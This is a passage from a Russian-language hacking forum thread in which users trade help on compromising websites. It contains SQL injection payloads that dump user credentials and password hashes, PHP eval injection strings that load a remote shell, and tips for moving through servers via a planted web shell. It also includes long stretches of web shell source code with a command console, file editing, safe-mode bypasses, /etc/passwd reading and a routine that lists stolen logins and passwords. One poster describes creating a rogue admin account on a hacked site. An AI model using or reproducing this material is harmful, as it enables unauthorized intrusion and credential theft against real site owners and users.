Ищи директорию с правами на запись, хотя возможно там даже есть запись во всех директориях. Ты можешь ходить по каталогам из шелла что я тебе дал, используй GET запросы, копируй ссылку "на уровень вверх" например и подставляй переменную с параметрами из этой ссылки в адресной строке.
zloy_fantom
18.03.2013, 19:32
Может немного не в тему, но все-же:
Есть рабочий site.com.ua
И есть файлы, доступные для скачивания по адресам p.site.com.ua/[имя файла] и l.site.com.ua/[имя файла], на которые никакого намека в конфигах не нашел. Сам сайт расположен в opt/www/public/index.php причем на нем есть раскрытие путей (так и раскрыл конфиги), как такое может быть сделано и как это можно использовать? Спасибо
Sat-hacker
20.03.2013, 17:36
Иногда попадаються шелы на которых много доменов но они подписаны не как название сайта site.ru а наприме hzhzhzhz как узнать какой это домен если он не прописан не в robots.txt и т.д,есть ли какой-то скрипт который отправляет инфу о домене например на мыло?Спасибо.
Иногда попадаються шелы на которых много доменов но они подписаны не как название сайта site.ru а наприме hzhzhzhz как узнать какой это домен если он не прописан не в robots.txt и т.д,есть ли какой-то скрипт который отправляет инфу о домене например на мыло?Спасибо.
какое мыло? ты чё? смской тебе не прислать?))
если не можешь найти логи то ставь в индексы и жди результата
Вопрос насчет search.php SQLi в булке 4.1.2;
Добавляю к запросу &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#
Вместо того чтобы выводить данные, выводит слово: Uncategorized
Кто, что знает насчет этого?
тут и логично можно понять что дыру пропатчили
Может немного не в тему, но все-же:
Есть рабочий site.com.ua
И есть файлы, доступные для скачивания по адресам p.site.com.ua/[имя файла] и l.site.com.ua/[имя файла], на которые никакого намека в конфигах не нашел. Сам сайт расположен в opt/www/public/index.php причем на нем есть раскрытие путей (так и раскрыл конфиги), как такое может быть сделано и как это можно использовать? Спасибо
никак
Sat-hacker
20.03.2013, 18:09
qaz а чего ждать?
А смской было бы не плохо
qaz
а чего ждать?
пока кто нибуть не зайдёт на сайт, как кто-то зайдёт домен запишется в log.txt
Ищи директорию с правами на запись, хотя возможно там даже есть запись во всех директориях. Ты можешь ходить по каталогам из шелла что я тебе дал, используй GET запросы, копируй ссылку "на уровень вверх" например и подставляй переменную с параметрами из этой ссылки в адресной строке.
Выход был настолько прост, что я его и не заметил (с)
Благодарю! Добра тебе, милейший.
Господа, новая задача:
PHP 5.2.6-1+LENNY16
allow_url_fopen On
allow_url_include Off
file_uploads On
magic_quotes_gpc On
magic_quotes_runtime Off
magic_quotes_sybase Off
cURL On
Дыра всё та же - PHP inj в URL. /search?name={${eval(stripslashes($_GET[cmd]))}}&cmd=phpinfo(); не пашет, name={${eval(stripslahes(file_get_contents($_COOKI E[shell])))}}, где содержание печеньки "shell" = 'линк на шелл', тоже, точнее срабатывают MQ, кавычки экранируются и запрос ломается. Идеи?
Sanic1977
20.03.2013, 22:52
Есть вопрос?
Вопрос такого плана:
на acunetix можно реализовать sql инъекцию такого вида:
?id=1'"or(ExtractValue(1,concat(0x3a,version())))="1
ответ: syntax error: ':5.5.9-log'
ставлю в браузер, инъекции не видно.
Есть подозрения что кавычки не передаются должным образом или срабатывает защита
Как быть?
Вопрос такого плана:
на acunetix можно реализовать sql инъекцию такого вида:
?id=1'"or(ExtractValue(1,concat(0x3a,version())))="1
ответ: syntax error: ':5.5.9-log'
ставлю в браузер, инъекции не видно.
Есть подозрения что кавычки не передаются должным образом
Как быть?
// Не верь мне, я - типичный скрипткидди.
Есть вероятность, что вся уязвимость построена на этой ошибке? 5.5.9, судя по всему, как раз таки и является версией MySQL. Попробуй database(), тогда уж и будет видно.
Либо просто включены magicquotes и, как я люблю писать, выход был настолько прост, что я его и не заметил (с)
Sanic1977
20.03.2013, 23:11
// Не верь мне, я - типичный скрипткидди.
Есть вероятность, что вся уязвимость построена на этой ошибке? 5.5.9, судя по всему, как раз таки и является версией MySQL. Попробуй database(), тогда уж и будет видно.
Либо просто включены magicquotes и, как я люблю писать,
выход был настолько прост, что я его и не заметил
(с)
?id=1'"or(ExtractValue(1,concat(0x3a,database())))="1
пишет Column 'url' cannot be null
в браузере ошибок не видно
?id=1'"or(ExtractValue(1,concat(0x3a,database())))="1
пишет Column 'url' cannot be null
в браузере ошибок не видно
Тогда не представляю, это же Blind SQLi, что геморройно, во всяком случае для креветки-меня. А зачем двойные кавычки в запросе?
И вот ещё (https://antichat.live/showpost.php/p/2673441/postcount/168/), покури.
Sanic1977
20.03.2013, 23:22
Тогда не представляю, это же Blind SQLi, что геморройно, во всяком случае для креветки-меня. А зачем двойные кавычки в запросе?
только с двойными кавычками выводится инфа
на acunetix выодится ошибка, а firefox нет
смотрел через прокси что идет,там
acunetix -> ?id=1'"or(ExtractValue(1,concat(0x3a,version())))="1
firefox -> ?id=1%27%22or(ExtractValue(1,concat(0x3a,user()))) =%221
может в этом?
из-за этого не могу автоматизировать
только с двойными кавычками выводится инфа
на acunetix выодится ошибка, а firefox нет
смотрел через прокси что идет,там
acunetix -> ?id=1'"or(ExtractValue(1,concat(0x3a,version())))="1
firefox -> ?id=1%27%22or(ExtractValue(1,concat(0x3a,user()))) =%221
может в этом?
из-за этого не могу автоматизировать
Нет, %27, например, это ' в HTML и т.д.
Не в этом дело
Sanic1977
21.03.2013, 00:16
Нет, %27, например, это ' в HTML и т.д.
Не в этом дело
там знак ' не играет роли без него можно обойтись просто стоит, инъекция через кавычки "
zloy_fantom
21.03.2013, 00:42
никак
Спасибо, хоть и жаль, есть еще идея:
Как я уже говорил, есть раскрытие путей и могу читать файлы.
Вот часть запроса в одном из скриптов:
sql_query("SELECT id, pass, FROM users
В одном из скриптов есть строка:
$sql_name = "all";
Файл my.cnf содержит настройки:
basedir = /usr
datadir = /var/lib/mysql
Из чего делаю вывод, что в папке /var/lib/mysql/all лежит файл базы данных с именем users и неизвестным мне расширением, однако просмотр файлов, которым я располагаю, этот файл не показывает. Пробовал без расширения и с расширениями MYI, MYD, frm. Что еще можно попробовать? Может путь неверно указал???
Спасибо
недавно мне на сайт залили шелл. я его скачал и нашёл в нём левую бд,тоесть вырезку из конфига пароль пользователь базы и путь к ней. я спокойно зашёл в бд далее создал второго админа после чего заглянул в админку сайта.к слову сказать сайт серьёзный с хорошими пузомерками и в индексе море страниц.в связи с этим у меня два вопроса. что за шелл такой мне залили?почему в нём оказалась бд сайта? и что собственно теперь с эти сайтом делать?
только с двойными кавычками выводится инфа
на acunetix выодится ошибка, а firefox нет
смотрел через прокси что идет,там
acunetix -> ?id=1'"or(ExtractValue(1,concat(0x3a,version())))="1
firefox -> ?id=1%27%22or(ExtractValue(1,concat(0x3a,user()))) =%221
может в этом?
из-за этого не могу автоматизировать
Скорее всего проблема в редиректе.
В акунетиксе он отключен по умолчанию.
Из чего делаю вывод, что в папке /var/lib/mysql/all лежит файл базы данных с именем users
ничего там не лежит
недавно мне на сайт залили шелл. я его скачал и нашёл в нём левую бд,тоесть вырезку из конфига пароль пользователь базы и путь к ней. я спокойно зашёл в бд далее создал второго админа после чего заглянул в админку сайта.к слову сказать сайт серьёзный с хорошими пузомерками и в индексе море страниц.в связи с этим у меня два вопроса. что за шелл такой мне залили?почему в нём оказалась бд сайта? и что собственно теперь с эти сайтом делать?
чёза бред ты тут сказал? может это вовсе не шелл,
zloy_fantom
21.03.2013, 21:38
ничего там не лежит
А где лежит? В чем ошибка рассуждений? какой информации не хватает для определения того, в какой папке на сервере расположены таблицы базы данных?
Спасибо
чёза бред ты тут сказал? может это вовсе не шелл,
вот кусок из шелла в конце база
function actionConsole() { if(isset($_POST['ajax'])) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); echo "document.cf.cmd.value='';\n"; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "document.mf.c.value='".$GLOBALS['cwd']."';"; } } echo "document.cf.output.value+='".$temp."';"; echo "document.cf.output.scrollTop = document.cf.outpu t.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\n", $temp; exit; } printHeader(); ?> if(window.Event) window.captureEvents(Event.K EYDOWN); var cmds = new Array(""); var cur = 0; function kp(e) { var n = (window.Event) ? e.which : e.keyCode; if(n == 38) { cur--; if(cur>=0) document.cf.cmd.value = cmds[cur]; else cur++; } else if(n == 40) { cur++; if(cur Console'; foreach($GLOBALS['aliases'] as$n=>$v) { if($v=='') { echo''; continue; } echo ''.$n.''; } if(empty($_POST['ajax'])&&!empty($_POST['p1']))$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] =false; echo'>"> send using AJAX
'; if(!empty($_POST['p1'])) { echohtmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1'])); } echo''; echo'document.cf.cmd.focus();';pr intFooter(); } functionactionLogout() { unset( $_SESSION[md5($_SERVER['HTTP_HOST'])]); echo'bye!'; } functionactionSelfRemove() {p rintHeader(); if($_POST['p1'] =='yes') { if(@unlink(SELF_PATH)) die('Shell has been removed'); else echo'unlink error!' ; } echo'SuicideReally want to remove the s hell?
Yes';printFooter(); } functionactionSniffer() { printHeader(); echo'Sniffer';$host='сдесь омер заказа.mysql.ihc.ru';$db='сам база_db';$user='сдесь прописа пользователь_db';$passwd='ну и пароль';$link=mysql_connect($host,$user,$pa sswd);mysql_select_db($db,$link);$result=mysql_que ry("SELECT * FROM jos_phocadownload_templates");$n=mysql_num_rows($result); echo""; for($i=0;$i".' Login:',mysql_result($result,$i,login),"".'Pass:',mysql_result($result,$i,pass),"".'IP:',mysql_result($result,$i,ip),"".'Date:',mysql_result($result,$i,date),"".'id:',mysql_result($result,$i,id),"".'referer:',mysql_result($result,$i,ref),""; echo""; echo"";mysql_close($link);printFooter(); }
?>
function sa() {
for(i=0;i
NameSizeModifyOwner/GroupPermissionsActions";
$dirs = $files = $links = array();
$n = count($dirContent);
for($i=0;$i $dirContent[$i],
'path' => $GLOBALS['cwd'].$dirContent[$i],
'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
'owner' => $ow['name']?$ow['name']fileowner($dirContent[$i]),
'group' => $gr['name']?$gr['name']filegroup($dirContent[$i])
);
if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
$files[] = array_merge($tmp, array('type' => 'file'));
elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
$links[] = array_merge($tmp, array('type' => 'link'));
elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
$dirs[] = array_merge($tmp, array('type' => 'dir'));
}
$GLOBALS['sort'] = $sort;
function cmp($a, $b) {
if($GLOBALS['sort'][0] != 'size')
return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
else
return (($a['size'] '.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');">[ '.htmlspecialchars($f['name']).' ]').''.(($f['type']=='file')?viewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms']
.'R T'.(($f['type']=='file')?' E D':'').'';
$l = $l?0:1;
}
?>
'>
'>
CopyMoveDeletePaste >">
String conversions';
$stringTools = array(
'Base64 encode' => 'base64_encode',
'Base64 decode' => 'base64_decode',
'Url encode' => 'urlencode',
'Url decode' => 'urldecode',
'Full urlencode' => 'full_urlencode',
'md5 hash' => 'md5',
'sha1 hash' => 'sha1',
'crypt' => 'crypt',
'CRC32' => 'crc32',
'ASCII to HEX' => 'ascii2hex',
'HEX to ASCII' => 'hex2ascii',
'HEX to DEC' => 'hexdec',
'HEX to BIN' => 'hex2bin',
'DEC to HEX' => 'dechex',
'DEC to BIN' => 'decbin',
'BIN to HEX' => 'bin2hex',
'BIN to DEC' => 'bindec',
'String to lower case' => 'strtolower',
'String to upper case' => 'strtoupper',
'Htmlspecialchars' => 'htmlspecialchars',
'String length' => 'strlen',
);
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo "";
foreach($stringTools as $k => $v)
echo "".$k."";
echo ">'/> send using AJAX
".htmlspecialchars(@$_POST['p2'])."";
if(!empty($_POST['p1'])) {
if(function_exists($_POST['p1']))
echo htmlspecialchars($_POST['p1']($_POST['p2']));
}
echo"";
?>
Search for hash:
File tools';
if( !file_exists(@$_POST['p1']) ) {
echo 'File not exists';
printFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
$gid = @posix_getgrgid(@fileowner($_POST['p1']));
echo 'Name: '.htmlspecialchars($_POST['p1']).' Size: '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' Permission: '.viewPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
';
echo 'Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'
';
if( empty($_POST['p2']) )
$_POST['p2'] = 'view';
if( is_file($_POST['p1']) )
$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
else
$m = array('Chmod', 'Rename', 'Touch');
foreach($m as $v)
echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' ';
echo '
';
switch($_POST['p2']) {
case 'view':
echo '';
$fp = @fopen($_POST['p1'], 'r');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo '';
break;
case 'highlight':
if( is_readable($_POST['p1']) ) {
echo '';
$code = highlight_file($_POST['p1'],true);
echo str_replace(array(''), array(''),$code).'';
}
break;
case 'chmod':
if( !empty($_POST['p3']) ) {
$perms = 0;
for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
if(!@chmod($_POST['p1'], $perms))
echo 'Can\'t set permissions!
document.mf.p3.value="";';
else
die('g(null,null,null,null,"")');
}
echo '>">';
break;
case 'edit':
if( !is_writable($_POST['p1'])) {
echo 'File isn\'t writeable';
break;
}
if( !empty($_POST['p3']) ) {
@file_put_contents($_POST['p1'],$_POST['p3']);
echo 'Saved!
document.mf.p3.value="";';
}
echo '';
$fp = @fopen($_POST['p1'], 'r');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo '>">';
break;
case 'hexdump':
$c = @file_get_contents($_POST['p1']);
$n = 0;
$h = array('00000000
','','');
$len = strlen($c);
for ($i=0; $i'.$h[0].''.$h[1].''.htmlspecialchars($h[2]).'';
break;
case 'rename':
if( !empty($_POST['p3']) ) {
if(!@rename($_POST['p1'], $_POST['p3']))
echo 'Can\'t rename!
document.mf.p3.value="";';
else
die('g(null,null,"'.urlencode($_POST['p3']).'",null,"")');
}
echo '>">';
break;
case 'touch':
if( !empty($_POST['p3']) ) {
$time = strtotime($_POST['p3']);
if($time) {
if(@touch($_POST['p1'],$time,$time))
die('g(null,null,null,null,"")');
else {
echo 'Fail!document.mf.p3.value="";';
}
} else echo 'Bad time format!document.mf.p3.value="";';
}
echo '>">';
break;
case 'mkfile':
break;
}
echo '';
printFooter();
}
function actionSafeMode() {
$temp='';
ob_start();
switch($_POST['p1']) {
case 1:
$temp=@tempnam($test, 'cx');
if(@copy("compress.zlib://".$_POST['p2'], $temp)){
echo @file_get_contents($temp);
unlink($temp);
} else
echo 'Sorry... Can\'t open file';
break;
case 2:
$files = glob($_POST['p2'].'*');
if( is_array($files) )
foreach ($files as $filename)
echo $filename."\n";
break;
case 3:
$ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
curl_exec($ch);
break;
case 4:
ini_restore("safe_mode");
ini_restore("open_basedir");
include($_POST['p2']);
break;
case 5:
for(;$_POST['p2'] Safe mode bypass';
echo 'Copy (read file)>">
Glob (list dir)>">
Curl (read file)>">
Ini_restore (read file)>">
Posix_getpwuid ("Read" /etc/passwd)FromTo>">
Imap_open (read file)>">';
if($temp)
echo ''.$temp.'';
echo '';
printFooter();
}
function actionConsole() {
if(isset($_POST['ajax'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
ob_start();
echo "document.cf.cmd.value='';\n";
$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
if(@chdir($match[1])) {
$GLOBALS['cwd'] = @getcwd();
echo "document.mf.c.value='".$GLOBALS['cwd']."';";
}
}
echo "document.cf.output.value+='".$temp."';";
echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
$temp = ob_get_clean();
echo strlen($temp), "\n", $temp;
exit;
}
printHeader();
?>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array("");
var cur = 0;
function kp(e) {
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
cur--;
if(cur>=0)
document.cf.cmd.value = cmds[cur];
else
cur++;
} else if(n == 40) {
cur++;
if(cur
Console';
foreach($GLOBALS['aliases'] as $n => $v) {
if($v == '') {
echo '';
continue;
}
echo ''.$n.'';
}
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo '>"> send using AJAX
';
if(!empty($_POST['p1'])) {
echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
}
echo '';
echo 'document.cf.cmd.focus();';
printFooter();
}
function actionLogout() {
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
echo 'bye!';
}
function actionSelfRemove() {
printHeader();
if($_POST['p1'] == 'yes') {
if(@unlink(SELF_PATH))
die('Shell has been removed');
else
echo 'unlink error!';
}
echo 'SuicideReally want to remove the shell?
Yes';
printFooter();
}
function actionSniffer() {
printHeader();
echo 'Sniffer';
$host='сдесь номер заказа.mysql.ihc.ru';
$db='сама база_db';
$user='сдесь прописан пользователь_db';
$passwd='ну и пароль';
$link = mysql_connect($host, $user, $passwd);
mysql_select_db($db, $link);
$result=mysql_query("SELECT * FROM jos_phocadownload_templates");
$n=mysql_num_rows($result);
echo "";
for($i=0;$i".' Login:',mysql_result($result,$i,login),"".'Pass:',mysql_result($result,$i,pass),"".'IP:',mysql_result($result,$i,ip),"".'Date:',mysql_result($result,$i,date),"".'id:',mysql_result($result,$i,id),"".'referer:',mysql_result($result,$i,ref),"";
echo "";
echo "";
mysql_close($link);
printFooter();
}[/I][/I]
А где лежит? В чем ошибка рассуждений? какой информации не хватает для определения того, в какой папке на сервере расположены таблицы базы данных?
Спасибо
они в БД лежат а не в папке
http://rghost.ru/44661788 полная версия
собственно нафига ты это всё сюда павыкладывал?? ты спрашивал что с найденыйм сайтом делать? - ответ что хочешь то делай, к данной теме это не имеет никакого отношения
собственно нафига ты это всё сюда павыкладывал?? ты спрашивал что с найденыйм сайтом делать? - ответ что хочешь то делай, к данной теме это не имеет никакого отношения
Извиняюсь конечно что не в тот топик начал писать. Просто с мобилки изначально юзал форум и не очень удобно было искать подходящую тему.Вот и написал сюда, мне показалось что этот топик более подходит.С сайтом мне понятно что делать. Просто я с шелами особо не сталкивался вот по этому и попросил разьяснить по чему в нём оказалась бд, для чего она там?И вообще это часто встречается что в шелл вписывают бд других сайтов? И шелл ли это???
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot